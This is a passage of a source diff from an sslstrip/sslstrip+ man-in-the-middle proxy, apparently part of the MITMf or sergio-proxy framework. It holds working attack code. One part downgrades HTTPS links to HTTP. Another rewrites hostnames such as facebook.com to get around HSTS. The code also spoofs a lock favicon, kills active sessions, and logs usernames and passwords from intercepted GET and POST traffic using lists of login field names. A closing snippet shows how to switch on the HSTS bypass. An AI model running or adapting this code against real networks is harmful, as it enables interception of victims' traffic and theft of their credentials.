absoluteLink = absoluteLink.replace('&amp;', '&')
self.urlMonitor.addSecureLink(self.client.getClientIP(), absoluteLink);
def replaceCssLinks(self, data):
iterator = re.finditer(SSLServerConnection.cssExpression, data)
for match in iterator:
self.buildAbsoluteLink(match.group(1))
return data
def replaceFavicon(self, data):
match = re.search(SSLServerConnection.iconExpression, data)
if (match != None):
data = re.sub(SSLServerConnection.iconExpression,
"<link rel=\"SHORTCUT ICON\" href=\"/favicon-x-favicon-x.ico\">", data)
else:
data = re.sub(SSLServerConnection.headExpression,
"<head><link rel=\"SHORTCUT ICON\" href=\"/favicon-x-favicon-x.ico\">", data)
return data
def replaceSecureLinks(self, data):
data = ServerConnection.replaceSecureLinks(self, data)
data = self.replaceCssLinks(data)
if (self.urlMonitor.isFaviconSpoofing()):
data = self.replaceFavicon(data)
iterator = re.finditer(SSLServerConnection.linkExpression, data)
for match in iterator:
self.buildAbsoluteLink(match.group(10))
return data

View file

@@ -1,230 +0,0 @@
# Copyright (c) 2004-2009 Moxie Marlinspike
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import logging, re, string, random, zlib, gzip, StringIO
import plugins
from twisted.web.http import HTTPClient
from URLMonitor import URLMonitor
from libs.sergioproxy.ProxyPlugins import ProxyPlugins
class ServerConnection(HTTPClient):
''' The server connection is where we do the bulk of the stripping. Everything that
comes back is examined. The headers we don't like are removed, and the links are stripped
from HTTPS to HTTP.
'''
urlExpression = re.compile(r"(https://[\w\d:#@%/;$()~_?\+-=\\\.&]*)", re.IGNORECASE)
urlType = re.compile(r"https://", re.IGNORECASE)
urlTypewww = re.compile(r"https://www", re.IGNORECASE)
urlwExplicitPort = re.compile(r'https://www([a-zA-Z0-9.]+):[0-9]+/', re.IGNORECASE)
urlExplicitPort = re.compile(r'https://([a-zA-Z0-9.]+):[0-9]+/', re.IGNORECASE)
urlToken1 = re.compile(r'(https://[a-zA-Z0-9./]+\?)', re.IGNORECASE)
urlToken2 = re.compile(r'(https://[a-zA-Z0-9./]+)\?{0}', re.IGNORECASE)
# urlToken2 = re.compile(r'(https://[a-zA-Z0-9.]+/?[a-zA-Z0-9.]*/?)\?{0}', re.IGNORECASE)
def __init__(self, command, uri, postData, headers, client):
self.command = command
self.uri = uri
self.postData = postData
self.headers = headers
self.client = client
self.urlMonitor = URLMonitor.getInstance()
self.plugins = ProxyPlugins.getInstance()
self.isImageRequest = False
self.isCompressed = False
self.contentLength = None
self.shutdownComplete = False
#these field names were stolen from the etter.fields file (Ettercap Project)
self.http_userfields = ['log','login', 'wpname', 'ahd_username', 'unickname', 'nickname', 'user', 'user_name',
'alias', 'pseudo', 'email', 'username', '_username', 'userid', 'form_loginname', 'loginname',
'login_id', 'loginid', 'session_key', 'sessionkey', 'pop_login', 'uid', 'id', 'user_id', 'screename',
'uname', 'ulogin', 'acctname', 'account', 'member', 'mailaddress', 'membername', 'login_username',
'login_email', 'loginusername', 'loginemail', 'uin', 'sign-in']
self.http_passfields = ['ahd_password', 'pass', 'password', '_password', 'passwd', 'session_password', 'sessionpassword',
'login_password', 'loginpassword', 'form_pw', 'pw', 'userpassword', 'pwd', 'upassword', 'login_password',
'passwort', 'passwrd', 'wppassword', 'upasswd']
def getLogLevel(self):
return logging.DEBUG
def getPostPrefix(self):
return "POST"
def sendRequest(self):
if self.command == 'GET':
logging.info("%s Sending Request: %s" % (self.client.getClientIP(), self.headers['host']))
#check for creds passed in GET requests.. It's surprising to see how many people still do this (please stahp)
for user in self.http_userfields:
username = re.findall("("+ user +")=([^&|;]*)", self.uri, re.IGNORECASE)
for passw in self.http_passfields:
password = re.findall("(" + passw + ")=([^&|;]*)", self.uri, re.IGNORECASE)
if (username and password):
message = "%s %s Possible Credentials (%s):\n%s" % (self.client.getClientIP(), self.command, self.headers['host'], self.uri)
logging.warning(message)
self.plugins.hook()
self.sendCommand(self.command, self.uri)
def sendHeaders(self):
for header, value in self.headers.items():
logging.debug(self.getLogLevel(), "Sending header: %s : %s" % (header, value))
self.sendHeader(header, value)
self.endHeaders()
def sendPostData(self):
if 'clientprfl' in self.uri:
self.plugins.hook()
elif 'keylog' in self.uri:
self.plugins.hook()
else:
logging.warning("%s %s Data (%s):\n%s" % (self.client.getClientIP(),self.getPostPrefix(),self.headers['host'],self.postData))
self.transport.write(self.postData)
def connectionMade(self):
logging.debug(self.getLogLevel(), "HTTP connection made.")
self.plugins.hook()
self.sendRequest()
self.sendHeaders()
if (self.command == 'POST'):
self.sendPostData()
def handleStatus(self, version, code, message):
logging.debug(self.getLogLevel(), "Got server response: %s %s %s" % (version, code, message))
self.client.setResponseCode(int(code), message)
def handleHeader(self, key, value):
logging.debug("Got server header: %s:%s" % (key, value))
if (key.lower() == 'location'):
value = self.replaceSecureLinks(value)
if (key.lower() == 'content-type'):
if (value.find('image') != -1):
self.isImageRequest = True
logging.debug("Response is image content, not scanning...")
if (key.lower() == 'content-encoding'):
if (value.find('gzip') != -1):
logging.debug("Response is compressed...")
self.isCompressed = True
elif (key.lower() == 'content-length'):
self.contentLength = value
elif (key.lower() == 'set-cookie'):
self.client.responseHeaders.addRawHeader(key, value)
else:
self.client.setHeader(key, value)
self.plugins.hook()
def handleEndHeaders(self):
if (self.isImageRequest and self.contentLength != None):
self.client.setHeader("Content-Length", self.contentLength)
if self.length == 0:
self.shutdown()
def handleResponsePart(self, data):
if (self.isImageRequest):
self.client.write(data)
else:
HTTPClient.handleResponsePart(self, data)
def handleResponseEnd(self):
if (self.isImageRequest):
self.shutdown()
else:
try:
HTTPClient.handleResponseEnd(self)
except:
pass
def handleResponse(self, data):
if (self.isCompressed):
logging.debug("Decompressing content...")
data = gzip.GzipFile('', 'rb', 9, StringIO.StringIO(data)).read()
logging.debug("Read from server:\n" + data)
#logging.log(self.getLogLevel(), "Read from server:\n <large data>" )
data = self.replaceSecureLinks(data)
res = self.plugins.hook()
data = res['data']
if (self.contentLength != None):
self.client.setHeader('Content-Length', len(data))
try:
self.client.write(data) #Gets rid of some generic errors
except:
pass
try:
self.shutdown()
except:
logging.info("Client connection dropped before request finished.")
def replaceSecureLinks(self, data):
sustitucion = {}
patchDict = self.urlMonitor.patchDict
if len(patchDict)>0:
dregex = re.compile("(%s)" % "|".join(map(re.escape, patchDict.keys())))
data = dregex.sub(lambda x: str(patchDict[x.string[x.start() :x.end()]]), data)
iterator = re.finditer(ServerConnection.urlExpression, data)
for match in iterator:
url = match.group()
logging.debug("Found secure reference: " + url)
nuevaurl=self.urlMonitor.addSecureLink(self.client.getClientIP(), url)
logging.debug("LEO replacing %s => %s"%(url,nuevaurl))
sustitucion[url] = nuevaurl
#data.replace(url,nuevaurl)
#data = self.urlMonitor.DataReemplazo(data)
if len(sustitucion)>0:
dregex = re.compile("(%s)" % "|".join(map(re.escape, sustitucion.keys())))
data = dregex.sub(lambda x: str(sustitucion[x.string[x.start() :x.end()]]), data)
#logging.debug("LEO DEBUG received data:\n"+data)
#data = re.sub(ServerConnection.urlExplicitPort, r'https://\1/', data)
#data = re.sub(ServerConnection.urlTypewww, 'http://w', data)
#if data.find("http://w.face")!=-1:
# logging.debug("LEO DEBUG Found error in modifications")
# raw_input("Press Enter to continue")
#return re.sub(ServerConnection.urlType, 'http://web.', data)
return data
def shutdown(self):
if not self.shutdownComplete:
self.shutdownComplete = True
try:
self.client.finish()
self.transport.loseConnection()
except:
pass

View file

@@ -1,44 +0,0 @@
# Copyright (c) 2004-2009 Moxie Marlinspike
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import logging
from twisted.internet.protocol import ClientFactory
class ServerConnectionFactory(ClientFactory):
def __init__(self, command, uri, postData, headers, client):
self.command = command
self.uri = uri
self.postData = postData
self.headers = headers
self.client = client
def buildProtocol(self, addr):
return self.protocol(self.command, self.uri, self.postData, self.headers, self.client)
def clientConnectionFailed(self, connector, reason):
logging.debug("Server connection failed.")
destination = connector.getDestination()
if (destination.port != 443):
logging.debug("Retrying via SSL")
self.client.proxyViaSSL(self.headers['host'], self.command, self.uri, self.postData, self.headers, 443)
else:
self.client.finish()

View file

@@ -1,29 +0,0 @@
# Copyright (c) 2004-2009 Moxie Marlinspike
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
from twisted.web.http import HTTPChannel
from ClientRequest import ClientRequest
class StrippingProxy(HTTPChannel):
'''sslstrip is, at heart, a transparent proxy server that does some unusual things.
This is the basic proxy server class, where we get callbacks for GET and POST methods.
We then proxy these out using HTTP or HTTPS depending on what information we have about
the (connection, client_address) tuple in our cache.
'''
requestFactory = ClientRequest

View file

@@ -1,140 +0,0 @@
# URLMonitor
import re
import logging
from configobj import ConfigObj
class URLMonitor:
'''
The URL monitor maintains a set of (client, url) tuples that correspond to requests which the
server is expecting over SSL. It also keeps track of secure favicon urls.
'''
# Start the arms race, and end up here...
javascriptTrickery = [re.compile("http://.+\.etrade\.com/javascript/omntr/tc_targeting\.html")]
_instance = None
sustitucion = {} # LEO: diccionario host / sustitucion
real = {} # LEO: diccionario host / real
patchDict = {
'https:\/\/fbstatic-a.akamaihd.net':'http:\/\/webfbstatic-a.akamaihd.net',
'https:\/\/www.facebook.com':'http:\/\/social.facebook.com',
'return"https:"':'return"http:"'
}
def __init__(self):
self.strippedURLs = set()
self.strippedURLPorts = {}
self.redirects = []
self.faviconReplacement = False
hsts_config = ConfigObj("./config/hsts_bypass.cfg")
for k,v in hsts_config.items():
self.sustitucion[k] = v
self.real[v] = k
def isSecureLink(self, client, url):
for expression in URLMonitor.javascriptTrickery:
if (re.match(expression, url)):
return True
return (client,url) in self.strippedURLs
def writeClientLog(self, client, headers, message):
if not os.path.exists("./logs"):
os.makedirs("./logs")
if (client.getClientIP() + '.log') not in os.listdir("./logs"):
try:
log_message = "#Log file for %s (%s)\n" % (client.getClientIP(), headers['user-agent'])
except KeyError:
log_message = "#Log file for %s\n" % client.getClientIP()
log_file = open("./logs/" + client.getClientIP() + ".log", 'a')
log_file.write(log_message + message + "\n")
log_file.close()
else:
log_file = open("./logs/" + client.getClientIP() + ".log", 'a')
log_file.write(message + "\n")
log_file.close()
def getSecurePort(self, client, url):
if (client,url) in self.strippedURLs:
return self.strippedURLPorts[(client,url)]
else:
return 443
def addRedirection(self, from_url, to_url):
for s in self.redirects:
if from_url in s:
s.add(to_url)
return
self.redirects.append(set([from_url,to_url]))
def getRedirectionSet(self, url):
for s in self.redirects:
if url in s:
return s
return set([url])
def addSecureLink(self, client, url):
methodIndex = url.find("//") + 2
method = url[0:methodIndex]
pathIndex = url.find("/", methodIndex)
host = url[methodIndex:pathIndex].lower()
path = url[pathIndex:]
port = 443
portIndex = host.find(":")
if (portIndex != -1):
host = host[0:portIndex]
port = host[portIndex+1:]
if len(port) == 0:
port = 443
#LEO: Sustituir HOST
if not self.sustitucion.has_key(host):
lhost = host[:4]
if lhost=="www.":
self.sustitucion[host] = "w"+host
self.real["w"+host] = host
else:
self.sustitucion[host] = "web"+host
self.real["web"+host] = host
logging.info("LEO: ssl host (%s) tokenized (%s)" % (host,self.sustitucion[host]) )
url = 'http://' + host + path
#logging.debug("LEO stripped URL: %s %s"%(client, url))
self.strippedURLs.add((client, url))
self.strippedURLPorts[(client, url)] = int(port)
return 'http://'+self.sustitucion[host]+path
def setFaviconSpoofing(self, faviconSpoofing):
self.faviconSpoofing = faviconSpoofing
def isFaviconSpoofing(self):
return self.faviconSpoofing
def isSecureFavicon(self, client, url):
return ((self.faviconSpoofing == True) and (url.find("favicon-x-favicon-x.ico") != -1))
def URLgetRealHost(self,host):
logging.debug("Parsing host: %s"%host)
if self.real.has_key(host):
logging.debug("New host: %s"%self.real[host])
return self.real[host]
else:
logging.debug("New host: %s"%host)
return host
def getInstance():
if URLMonitor._instance == None:
URLMonitor._instance = URLMonitor()
return URLMonitor._instance
getInstance = staticmethod(getInstance)

View file

@@ -33,7 +33,7 @@ if __name__ == "__main__":
sgroup.add_argument("-f", "--favicon", action="store_true", help="Substitute a lock favicon on secure requests.")
sgroup.add_argument("-k", "--killsessions", action="store_true", help="Kill sessions in progress.")
sgroup.add_argument('-d', '--disable-proxy', dest='disproxy', action='store_true', default=False, help='Disable the SSLstrip Proxy')
sgroup.add_argument("-b", "--bypass-hsts", dest='hsts', action="store_true", help="Enable HSTS bypass")
sgroup.add_argument("-b", "--bypass-hsts", dest='hsts', action="store_true", default=False, help="Enable HSTS bypass")
#Initialize plugins
plugins = []
@@ -89,29 +89,11 @@ if __name__ == "__main__":
if args.disproxy:
ProxyPlugins.getInstance().setPlugins(load)
elif args.hsts:
from libs.sslstripplus.StrippingProxy import StrippingProxy
from libs.sslstripplus.URLMonitor import URLMonitor
URLMonitor.getInstance().setFaviconSpoofing(args.favicon)
CookieCleaner.getInstance().setEnabled(args.killsessions)
ProxyPlugins.getInstance().setPlugins(load)
strippingFactory = http.HTTPFactory(timeout=10)
strippingFactory.protocol = StrippingProxy
reactor.listenTCP(args.listen, strippingFactory)
print "\n[*] sslstrip v%s by Moxie Marlinspike running..." % sslstrip_version
print "[*] sslstrip+ by Leonardo Nve running..."
print "[*] sergio-proxy v%s online..." % sergio_version
else:
from libs.sslstrip.StrippingProxy import StrippingProxy
from libs.sslstrip.URLMonitor import URLMonitor
args.clients = False # temporary
URLMonitor.getInstance().setValues(args.favicon, args.clients)
URLMonitor.getInstance().setValues(args.favicon, args.hsts)
CookieCleaner.getInstance().setEnabled(args.killsessions)
ProxyPlugins.getInstance().setPlugins(load)
@@ -121,6 +103,8 @@ if __name__ == "__main__":
reactor.listenTCP(args.listen, strippingFactory)
print "\n[*] sslstrip v%s by Moxie Marlinspike running..." % sslstrip_version
if args.hsts:
print "[*] sslstrip+ by Leonardo Nve running..."
print "[*] sergio-proxy v%s online" % sergio_version
reactor.run()
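
With the merge, enabling the bypass from code is just a matter of the new setValues() keyword shown above. A hypothetical minimal wiring (requires ./config/hsts_bypass.cfg to exist, since URLMonitor reads it on first instantiation):

from libs.sslstrip.URLMonitor import URLMonitor  # same import path as the main script above

monitor = URLMonitor.getInstance()
monitor.setValues(faviconSpoofing=False, hstsbypass=True)   # clientLogging defaults to False
assert monitor.isHstsBypass()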